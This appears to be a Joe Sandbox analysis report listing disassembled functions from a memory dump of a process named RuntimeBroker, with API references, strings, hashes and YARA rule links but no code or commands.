API String ID: 1511944507-0
Opcode ID: 246ddfbbe37c4787f9720b27dc9f743496b3bb1ed6dcb5155dd6029a6c9a153e
Instruction ID: bbcbc5e145e4a8db3abb822320ad60a974f88cd161742ec1b03db7f1d512ae5e
Opcode Fuzzy Hash: 246ddfbbe37c4787f9720b27dc9f743496b3bb1ed6dcb5155dd6029a6c9a153e
Instruction Fuzzy Hash: 15514B22E1864286E732EF2AEC815BDE760FB49784FC44135EA4D436A6DF3CE541DB60

Function 00007FF72B05C330 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF72B05C35C
GetCurrentThreadId.KERNEL32 ref: 00007FF72B05C36A
GetCurrentProcessId.KERNEL32 ref: 00007FF72B05C376
QueryPerformanceCounter.KERNEL32 ref: 00007FF72B05C386

Memory Dump Source

Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 0f32e5fb6c1657f40c76225ea380b4ebd78bc5beffa0738dce661fe11625e8f4
Instruction ID: 0aa61c38757d4473b194e0fc7a595c17f3637b4adb96f75ecb8809fc0d7c5ecc
Opcode Fuzzy Hash: 0f32e5fb6c1657f40c76225ea380b4ebd78bc5beffa0738dce661fe11625e8f4
Instruction Fuzzy Hash: 3C11AC22B14F058AEB20DF64EC542B873A0FB09718F840E30DA2D86BB4DF3CD1A98750

Function 00007FF72B072F20 Relevance: 4.8, APIs: 3, Instructions: 340COMMON

Download Yara Rule

APIs

memcpy_s.LIBCPMT ref: 00007FF72B072F86
memcpy_s.LIBCPMT ref: 00007FF72B072FB1

Memory Dump Source

Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: memcpy_s
String ID:
API String ID: 1502251526-0
Opcode ID: b41cb84a548d2e61bdeb7bb10330278f5fecde395d7a0ce6ff99175555b28b3c
Instruction ID: 497f57961bd7a09ff20c75ae2d79717562673fbf54f9993de206475496c48cf2
Opcode Fuzzy Hash: b41cb84a548d2e61bdeb7bb10330278f5fecde395d7a0ce6ff99175555b28b3c
Instruction Fuzzy Hash: 8BC1D072B5828687EB359F19A84867AF791F784B84F84C134DB4A477A4DF3DE8028B40

Function 00007FF72B05979B Relevance: 4.1, Strings: 3, Instructions: 397COMMON

Download Yara Rule

Strings

, xrefs: 00007FF72B05987B
header crc mismatch, xrefs: 00007FF72B059C41
unknown header flags set, xrefs: 00007FF72B0597E5

Memory Dump Source

Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID:
String ID: $header crc mismatch$unknown header flags set
API String ID: 0-1127688429
Opcode ID: 6a55f11302ef793728786adf415505d571280719f8ef56880a9f0a37636d8ec0
Instruction ID: 7e96a11b528ffaf83255ba34865c1975ed001324970cf244f303d826e9d7b238
Opcode Fuzzy Hash: 6a55f11302ef793728786adf415505d571280719f8ef56880a9f0a37636d8ec0
Instruction Fuzzy Hash: D1F17372A183D54BE7B6AB1DC8C8A3ABAADFF44740F855534DB4947BA0CB38E540CB50

Function 00007FF72B078A38 Relevance: 3.2, APIs: 2, Instructions: 227COMMONLIBRARYCODE

Download Yara Rule

APIs

_clrfp.LIBCMT ref: 00007FF72B078C87
RaiseException.KERNEL32 ref: 00007FF72B078C98

Memory Dump Source

Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: ExceptionRaise_clrfp
String ID:
API String ID: 15204871-0
Opcode ID: 4367feba8b0fb5a89db2d79700bffb7903d016d74ce2a4ac284103265cf95646
Instruction ID: decbad6c4b2cd955186457433cec071a094654a59d86faa3ef8cfe3229071d99
Opcode Fuzzy Hash: 4367feba8b0fb5a89db2d79700bffb7903d016d74ce2a4ac284103265cf95646
Instruction Fuzzy Hash: A1B16D73604B898AE726DF2EC846378BBA0F744B48F158921DB5D837B4CB39E851DB14

Function 00007FF72B062CC4 Relevance: 2.8, Strings: 2, Instructions: 350COMMON

Download Yara Rule

Strings

, xrefs: 00007FF72B062E32
, xrefs: 00007FF72B063074

Memory Dump Source

Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID:
String ID: $
API String ID: 0-227171996
Opcode ID: 25965de2e6678be5c8c686b25b3b835ec4bf2bfab2b797158b347abdb642f747
Instruction ID: 1e8b506a43bc43779dd83fdef90e8bfe3cccd4c6310053a188dff0efe01366d1
Opcode Fuzzy Hash: 25965de2e6678be5c8c686b25b3b835ec4bf2bfab2b797158b347abdb642f747
Instruction Fuzzy Hash: 61E1C432B0864281EB7AAF2D8950139B3A0FF4DB48F945139DE9E076B4DF39E855CB50

Function 00007FF72B0595FB Relevance: 2.7, Strings: 2, Instructions: 218COMMON

Download Yara Rule

Strings

invalid window size, xrefs: 00007FF72B059769
incorrect header check, xrefs: 00007FF72B059782

Memory Dump Source

Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID:
String ID: incorrect header check$invalid window size
API String ID: 0-900081337
Opcode ID: 226024973a440a2a6261c5f164d8bafa30541a105b972a390c392a8354fe07a0
Instruction ID: 22ac88e1601392c4e0bdad7d9dea3b5e3f57eb4de8ae3f746d4a54325d6ceb6b
Opcode Fuzzy Hash: 226024973a440a2a6261c5f164d8bafa30541a105b972a390c392a8354fe07a0
Instruction Fuzzy Hash: 6591B972A182C54BE7B69B1DD8D8A3E7A9DFB44380F814139DA5A46BA0CB3CE544CF10

Function 00007FF72B06D200 Relevance: 2.6, Strings: 2, Instructions: 144COMMON

Download Yara Rule

Strings

e+000, xrefs: 00007FF72B06D30D
gfff, xrefs: 00007FF72B06D38A

Memory Dump Source

Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID:
String ID: e+000$gfff
API String ID: 0-3030954782
Opcode ID: 1324d18368fb7be0dec1b44ace24e6b174879433860390047f5d35653063db2a
Instruction ID: 8e060d9ec934b91e2adcbced152979ee83022610603a917344cde912a601c824
Opcode Fuzzy Hash: 1324d18368fb7be0dec1b44ace24e6b174879433860390047f5d35653063db2a
Instruction Fuzzy Hash: D0515822B182D646E7369F3A9C00769EB91F758B94F889379CB9847AE1CE3DD4448B10

Function 00007FF72B06CD6C Relevance: 1.5, Strings: 1, Instructions: 254COMMON

Download Yara Rule

Strings

gfffffff, xrefs: 00007FF72B06D0AE

Memory Dump Source

Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID:
String ID: gfffffff
API String ID: 0-1523873471
Opcode ID: ee332c23296b8dd3ed29fdb42bef122adb490463d0c8b601810d73b835641fc7
Instruction ID: 4e1412158273883a90c4be0ddf75ada2a57809ba3704e23f5cddcd8267f652be
Opcode Fuzzy Hash: ee332c23296b8dd3ed29fdb42bef122adb490463d0c8b601810d73b835641fc7
Instruction Fuzzy Hash: 93A14962B087C986EB32DF2EA8007ADBB91EB58784F448136DE4D477A5DE3DD501CB11

Function 00007FF72B067AAC Relevance: 1.4, Strings: 1, Instructions: 177COMMON

Download Yara Rule

Strings

TMP, xrefs: 00007FF72B067ACB

Memory Dump Source

Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: TMP
API String ID: 3215553584-3125297090
Opcode ID: 56dba3dd74e4928943856274ad8f0fa5ace65e28029dffb90eccd2550b3d5261
Instruction ID: eec12ab5a893e3977e4258b210376db53ec9f3d9a13c5ea192ae9a3aae95dc09
Opcode Fuzzy Hash: 56dba3dd74e4928943856274ad8f0fa5ace65e28029dffb90eccd2550b3d5261
Instruction Fuzzy Hash: 5551A021B0864241FA7ABF2A5D016BAD291EF88BD4F88553CDE0D477B6FE3CF4514A20

Function 00007FF72B072790 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00007FF72B072794

Memory Dump Source

Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: fe1a72d78314f5032ff6e3f3402ce84269ae1386cefa971ca0fc6f511f9bbc55
Instruction ID: 44cedde4970058c6f7a1675d659352b431ebc2dee8cc4c07f69e308e3f1e4aab
Opcode Fuzzy Hash: fe1a72d78314f5032ff6e3f3402ce84269ae1386cefa971ca0fc6f511f9bbc55
Instruction Fuzzy Hash: D4B09B10F17B45C1D61537155C552145354BF44700FD44034C40C41330DD2C11A55B10

Function 00007FF72B0628C0 Relevance: .3, Instructions: 327COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b05403af9c31de739a9311cbf741df56ce5de8bb6a66a9cc9bcf40cf40427d0b
Instruction ID: 0434bed1744b0405a8a64f55c96855b67432ee3e9217843464b8d34474379e62
Opcode Fuzzy Hash: b05403af9c31de739a9311cbf741df56ce5de8bb6a66a9cc9bcf40cf40427d0b
Instruction Fuzzy Hash: F7D10732B0864686E73AAF2D895027DA3A0EF4CB58F94513DCE8D476A4DF39D841CB60

Function 00007FF72B058B20 Relevance: .3, Instructions: 287COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6de572fc7ea0867e481f021e98a3cee959a95ba6dd1d6718a656c0f39a4e480
Instruction ID: 9ab2824a5d0359ef2fdf0db66fbf504d087d4161bc235b31612bc6ec7822b1d3
Opcode Fuzzy Hash: b6de572fc7ea0867e481f021e98a3cee959a95ba6dd1d6718a656c0f39a4e480
Instruction Fuzzy Hash: B8C1B3722142F14FD299FB29E8A957A73D1F798309BD4402AEB8747F85CA3CE414DB60

Function 00007FF72B061F30 Relevance: .2, Instructions: 241COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54646038064d7a6353eabae39e6447674b1691c16f4822fec46df2a19c6da082
Instruction ID: 0a829034988d6a2e5bd5f8fcb378dbb5fb236ad0ce2737fcf47286a426aa1477
Opcode Fuzzy Hash: 54646038064d7a6353eabae39e6447674b1691c16f4822fec46df2a19c6da082
Instruction Fuzzy Hash: C8B15B72B0868685E7769F2DC85423CBBA0E74DB48FA45139CB8E473A5CF39D851CB20

Function 00007FF72B06D880 Relevance: .2, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c5cf27518f3756e107451e616d5c43acfc5497bdc9406be32d6656a2e3ee85f8
Instruction ID: 2363422fcdf7676f3c886a5682bfce24e5fe0755eab103034c5d1ffc51392c0a
Opcode Fuzzy Hash: c5cf27518f3756e107451e616d5c43acfc5497bdc9406be32d6656a2e3ee85f8
Instruction Fuzzy Hash: 3381C172B1C68186E775EF1E984036AA691EB8D794F944339DA8D47BA9CE3CD5008F20

Function 00007FF72B075728 Relevance: .2, Instructions: 183COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 7a9558e86fa8b462753dac68b64cf5067dc6b1cda5ab5f882eee36bb89ede29b
Instruction ID: c0fa5a8f253200dfad2096efec2d81caf1275686767ef93818835cbffaf8f09e
Opcode Fuzzy Hash: 7a9558e86fa8b462753dac68b64cf5067dc6b1cda5ab5f882eee36bb89ede29b
Instruction Fuzzy Hash: 1261E522F1C28246F776AB2C9C102BDE681EF44770F944639D65D466F6DE6DE800EF20

Function 00007FF72B060C64 Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
Instruction ID: 005b9568365a9a2fe0e20ec74e4c744a7814bb25624e1177e58c9e7a28319481
Opcode Fuzzy Hash: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
Instruction Fuzzy Hash: 6E51A572B5865282E7369B2CC49063973A0EB4CB68F644139CE4D477B5EB3AEC43CB50

Function 00007FF72B061484 Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
Instruction ID: 4c6ba260aca7f12910cab6e109049df224893099bb79d73d9af7f6681bb17a0c
Opcode Fuzzy Hash: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
Instruction Fuzzy Hash: 32518376F18651C6E7359B2DC440238B3A0EB5DB58F646139DA4D077B4CB3AEC82CB50

Function 00007FF72B061074 Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
Instruction ID: 477e6467fbeb155b614f5c70228f21687fab53d0bc79918765b45e9de856d424
Opcode Fuzzy Hash: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
Instruction Fuzzy Hash: C2519336F1869186EB359B2DC84122873A0EB49B58F646139CE4D477B4CB7AEC93CB50

Function 00007FF72B060A60 Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3943df286285c50b07f09d339b53caaa0afa34ddfac4fad96d8a3f7ffd6ad23b
Instruction ID: e8c494f85bb50123682d31e82ba7e02448c5d47787a65a5ddfbdc250edece53a
Opcode Fuzzy Hash: 3943df286285c50b07f09d339b53caaa0afa34ddfac4fad96d8a3f7ffd6ad23b
Instruction Fuzzy Hash: 1451C832B5865185E7369B2DC480638B3A1EB4CF98F649135CE4C577A4EB3AEC43CB50

Function 00007FF72B061280 Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e734bc54909bdf7d9c6fd1772be64da5dc64d4f5bf3044a39ac3ba7850561882
Instruction ID: 6ddf3bc4f6ee85e747cbfaa79775ab6011b70b41eee7910fab2bf0a8ba9a4f62
Opcode Fuzzy Hash: e734bc54909bdf7d9c6fd1772be64da5dc64d4f5bf3044a39ac3ba7850561882
Instruction Fuzzy Hash: 6F51B272F1865285E7369B2DC440338A7A1EB49B58FA46135CE4D477B8CB3AEC93CB50

Function 00007FF72B060E70 Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
